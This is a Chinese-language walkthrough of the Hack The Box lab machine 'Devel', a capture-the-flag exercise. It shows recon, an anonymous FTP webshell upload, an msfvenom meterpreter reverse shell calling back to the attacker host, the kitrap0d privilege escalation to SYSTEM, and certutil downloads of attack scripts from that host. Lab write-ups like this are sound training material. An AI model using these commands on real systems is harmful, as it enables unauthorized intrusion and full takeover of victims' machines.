Hackthebox：Devel Walkthrough

预备知识

ftp anonymous登录、任意文件上传、msfvenom生成webshell、meterpreter后渗透

信息收集

nmap 探测一下开放端口和服务

nmap 10.10.10.5

结果如下

Nmap scan report for 10.10.10.5
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 29.83 seconds

有个http的80端口，那么应该有web服务了，老规矩扫一下目录

扫一下目录

dirb http://10.10.10.5/

在扫目录的间歇，扫一扫有没有已知的漏洞nmap -script=vuln 10.10.10.5 不过后来没有扫出来什么

两边都在扫，不浪费时间，试一试ftp能不能匿名登录

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

发现这里有个目录比较有趣

ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd  2_0_50727
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

到这里感觉ftp进入的目录有点像web目录，这也和dirb已经出的结果一样

URL_BASE: http://10.10.10.5/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://10.10.10.5/ ----
==> DIRECTORY: http://10.10.10.5/aspnet_client/

尝试直接传一个反向shell上去，因为是Windows，所以选择aspx的马

Getshell

这里直接使用kali自带的aspx马，另一个终端输入

cp /usr/share/webshells/aspx/cmdasp.aspx shell.aspx

之前ftp的终端，回到根目录输入命令

ftp> put ./shell.aspx
local: ./shell.aspx remote: ./shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (62.5090 MB/s)
ftp>

在浏览器访问http://10.10.10.5/shell.aspx

执行命令成功，不过这个马比较一般，所以等下换一个马

看下系统架构systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ££
System Boot Time:          8/12/2020, 3:33:21 ££
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 732 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.522 MB
Virtual Memory: In Use:    525 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.[01]: Intel(R) PRO/1000 MT Network ConnectionConnection Name: Local Area ConnectionDHCP Enabled:    NoIP address(es)[01]: 10.10.10.5

没有什么好的aspx大马，所以只能用msf了，oscp估计也没法用冰蝎吧

使用msfvenom先生成一个反向大马

msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.16 -f aspx -o reverse.aspx

再通过ftp传上去

本地开启一个msf的监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.16
set lport 4444
set ExitOnSession false
run

set ExitOnSession false //运行这条命令后,4444端口会一直处于监听状态

meterpreter > background
[*] Backgrounding session 21...
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 21
session => 21
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.16
lhost => 10.10.14.16
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms10_015_kitrap0d) > run[*] Started reverse TCP handler on 10.10.14.16:5555
[*] Launching notepad to host the exploit...
[+] Process 3968 launched.
[*] Reflectively injecting the exploit DLL into 3968...
[*] Injecting exploit into 3968 ...
[*] Exploit injected. Injecting payload into 3968...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 27 opened (10.10.14.16:5555 -> 10.10.10.5:49159) at 2020-12-05 19:44:53 +0800

补充查找提权方式

use post/multi/recon/local_exploit_suggester
set session 21
run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

查看现在的权限

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f user.txt.txt
Found 1 result...c:\Users\babis\Desktop\user.txt.txt (32 bytes)

后面是踩坑，大家可以不看

//本地进行监听 nc -lvp 4444，浏览器访问http://10.10.10.5/reverse.aspx

//然后返回netcat监听的终端，发现已经建立连接了

//使用下面的脚本检测提权 https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

//先在本机启动一个http服务python -m SimpleHTTPServer 80

//在netcat的终端进行下载certutil -urlcache -split -f http://10.10.14.16/winPEAS.bat c:\inetpub\wwwroot\winPEAS.bat

//然后运行.\winPEAS.bat，根据输出结果下载exp

searchsploit ms14-040

certutil -urlcache -split -f http://10.10.14.16/PowerUp.ps1 c:\inetpub\wwwroot\PowerUp.ps1